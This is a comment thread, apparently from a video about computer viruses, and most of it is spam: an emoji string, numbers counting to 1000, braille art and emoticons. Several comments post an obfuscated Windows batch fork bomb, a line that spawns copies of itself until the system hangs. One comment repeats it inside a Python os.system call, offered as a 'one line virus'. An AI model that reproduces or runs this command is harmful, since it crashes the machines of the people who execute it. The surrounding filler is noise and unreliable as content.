2 likes🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔🍔
0 likes^_^
0 likes0
0 likes1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
@echo.%0^|%0›$ ^_^ .c^md&$_›nul
0 likesso basically, cancer for computers?
1 likeReplies (1)
Yep
0 likes⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
1 like⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡛⠿⣿⣿⣿⣟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣿⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠽⣿⣿⣿⣿⣿⣿⣿⣿⣿⡷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⢿⣿⣿⡇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣿⠨⠫⢻⠿⣿⣿⣿⣻⣿⣿⣇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣜⢿⣟⡇⣿⣿⡟⣿⣿⣿⣿⣿⣿⣿⣿⣷⠫⠰⠳⢥⣅⡖⠿⣻⠸⣿⣿⡇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠁⠉⠛⠋⠙⠉⠙⡟⠛⠛⠃⠃⢉⡃⠿⠻⠟⠛⠛⠯⠩⡉⠆⠇⠀⠀⠀⠈⠐⠚⠛⠙⠂⠖⠄⠉⠉⠉⠉⠉⠙⠛⠛⠟⡛⠛⡋⣿⣿⡿⠻⢶⣾⣿⣿⣿⣏⢻⣿⣿⡿⣿⡇⣿⣿
⠀⠀⠀⠀⠀⠠⣤⣧⣤⠶⠒⠊⠁⠀⠀⢄⡀⠀⢀⡤⣠⣠⠦⡊⠁⠰⠤⣂⢠⡀⣤⣄⠀⠀⠠⠀⠀⠀⠁⠀⠀⠀⠀⠰⠁⠁⠇⣯⠯⡀⠀⠀⠹⠟⠉⠽⠟⢸⢟⡤⡀⢴⡇⣿⣿
⠖⠀⠀⠀⠀⠀⠉⠁⠀⠀⠀⠀⠀⠀⡀⢀⠐⠒⠓⠂⠑⢈⠒⠁⠀⢁⠂⠀⠁⠀⠀⣉⠀⠈⠐⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁
⠚⠉⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⡀⠀⡀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐
⣥⢠⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⡄⠀⠀⠀⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠀
⠉⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠀⠀⠀⠲⣴⢓⣆⣦⣄⡲⠶⠦⠶⣴⣤⢠⠤⡄⢈⣀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣤⣴⣶⣤⣶⣶⣶⣶⣶⣶⣶⣶⣶⣿⣿⣶⣾⣷⣷⠦⠿⠯⠍⣤⣤⣤⠤⡤⣬⢍⡻⡁⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⡀⠀⡀⡀⣜⣿⡭⠭⠉⠉⠉⠙⢉⢉⠉⠉⠉⠍⠉⠉⠙⠛⠛⠛⡿⠁⠀⠄⠀⠲⣤⠀⠈⠐⠀⠠⠀⠀⠀⠄⠀
⠠⣄⠄⠀⠤⣴⢤⠶⠶⠶⠶⠶⠠⠆⠐⠒⠒⠂⠂⠂⠐⠳⠀⠀⠀⣠⣞⣾⣿⣿⡹⢦⣍⢻⡙⡤⢆⠲⡈⠆⡰⢀⠂⠄⠠⠀⠀⢀⡇⠀⢌⠒⡀⠱⢎⡥⠐⡰⣀⢀⣀⣀⣀⣀⣤
⣀⢁⣁⡀⣀⡀⣄⣠⣀⣄⣀⠠⢀⡠⣤⣀⣀⣀⣀⣀⡀⠀⠠⣢⣾⡿⣽⣿⢿⣯⣟⠧⡜⢦⡙⢘⡘⠰⢐⠠⠁⠌⠐⠈⠀⠀⠀⢸⠃⠠⠈⠒⢁⠂⠉⠚⠈⢅⣭⣷⡜⢽⣿⣟⣿
⣿⣿⣟⣿⡿⣿⣻⣿⣽⣻⣿⣿⣿⣻⣟⣽⣛⣿⡿⣿⣢⢈⣘⠻⠿⠾⠍⠽⠯⠃⡞⢅⢈⣱⢨⡕⡬⣄⠣⢄⠣⡘⠌⠀⠀⠀⠀⢸⠀⠀⠀⠀⠄⢆⣠⣴⣾⣷⣿⢻⣳⡜⢿⡻⡟
⣷⢿⣿⣟⣿⢿⡿⣟⣿⢯⡿⣽⣳⡟⣾⣳⣽⣷⣿⣿⣿⣿⣿⣿⣿⣷⣾⣿⣿⣿⣿⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣷⣾⣦⣤⣿⣶⣿⠀⣀⣤⣴⣿⣾⠿⡿⣻⣭⣶⣿⡿⡟⣰⡙⣓
⡿⣾⢷⣿⣿⣾⣻⣯⣻⣏⣿⢍⣵⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣭⣾⣿⣿⣿⡟⠀⠨⢁⡉⢠
⣋⡙⣋⢍⣉⠍⡠⡔⣠⣴⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠀⠠⠐⡌⠀
⠢⠙⢌⣂⣉⠊⢅⣸⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠰⡅⡇⠠⠄
⡉⠁⢀⡠⠀⣱⠀⠉⠊⠻⣿⠿⠿⣿⣿⣿⣾⡯⠉⣭⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⣿⣿⣿⡿⠿⠫⠯⠿⠿⠿⢻⡿⡛⠉⠉⡻⣿⣿⣿⣿⣿⣿⣿⣿⢿⢃⠃⠀⠀⢧⠁⠀⠂
⠀⠀⠀⠀⠸⢹⣦⣀⡀⢠⡀⠀⠀⠀⠀⠈⠉⠻⠊⠉⠉⠉⠉⠉⠛⠻⠿⠿⠿⠿⠟⠋⠉⠀⠀⠀⠀⠀⠀⢀⣼⣵⡴⠂⡀⠀⢀⠙⣿⣿⣿⣿⣿⡿⡟⢉⡤⠛⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠁⢨⣶⣿⣻⡿⣿⢿⣀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣄⡀⠀⠀⠀⠀⢀⣀⣀⣴⣿⣿⣝⠃⠀⠁⠀⠈⢸⣿⣿⡿⡟⢙⡠⠞⠁⠀⠀⠀⡀⣀⠀⡀⣀⠁
⠀⠀⠀⢀⡀⡎⣹⣻⡿⣆⣡⣝⣯⣖⣒⣲⣶⠾⣶⣤⠤⢤⣀⣠⣤⣾⢞⣿⣿⣿⣿⣿⠿⣿⡿⣿⣛⣛⣯⣾⣿⠇⠀⢈⠠⡀⡀⡞⠟⢉⠠⠚⠁⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀
⠐⠈⠉⠁⠁⠃⠀⠩⠙⠲⠽⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣦⣼⣿⣿⣷⣶⣿⣿⣿⠿⠿⠿⠿⣿⣿⠟⣝⠀⠀⢐⠠⢶⣯⠑⠄⠁⠀⠀⠀⠀⠀⠀⠀⠠⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢠⠘⢷⣦⣤⣀⣐⡀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠙⠛⠛⠛⢿⠯⠭⠴⠶⠖⠒⠒⠚⠉⠀⢸⠰⡡⠪⡈⠀⠀⠀⢈⠺⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠐⠀⠀⠀⠀⠀
⠀⠀⠠⠄⠀⠁⠀⠀⠉⠀⠀⠙⠓⠲⠤⢤⣄⣀⣀⡀⠀⠄⠀⠀⠀⠀⠙⢿⣄⠀⠀⠀⠀⠈⠒⠀⡂⠀⢛⠉⠁⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⢎
⠀⠀⠁⠄⡀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠉⠉⠋⠉⠉⠈⠙⠛⠿⠷⠿⠿⠷⠚⠈⠀⠉⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⡻⠀
⠀⠀⠐⠂⠁⠂⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠘⡹⠀⠀
⠐⠀⠀⠄⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⡴⣡⠂⠀⠀
⠀⠀⠀⠂⢀⠀⠂⠂⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠂⠀⠀⠀⢀⡎⢤⡅⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣧⢩⠞⠀⠀⠀⠀⠀
⢐⡀⡐⢀⡄⠂⠄⠄⠂⡀⠐⠀⠁⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⡀⠄⡀⠀⠀⡀⠀⠀⢀⠀⠀⡀⠀⡀⠀⠀⡀⠀⠀⡀⠀⢀⣠⣿⣟⡳⠃⠀⠀⠀⠀⠀⠀
@echo.%0^|%0›$^_^.c^md&$_›nul
0 likes^_^
0 likes^_^
0 likeshey why dont you do CTRL + Shift + Win + B to refresh video driver
0 likesINTRODUCING A 1 LINE VIRUS IN PYTHON
0 likesos.system("@echo.%0^|%0›$^_^.c^md&$_›nul")
fuk syntax error
^_^
0 likes^-^
0 likes^_^
0 likesFinally enderman! Les go
0 likes^_^
0 likesLes go
1 likeThat GitHub calls a personal clone a "fork" is obscene, and you should wash your mouth out with soap. Please use Lava brand soap.
1 like.html.endermanch.andrew.script {
0 likesfont-size:0;
}
.html.endermanch.andrew.script:before {
content: 'Welcome back Andrew :D';
font-size:16px;
}
}
^_^
0 likes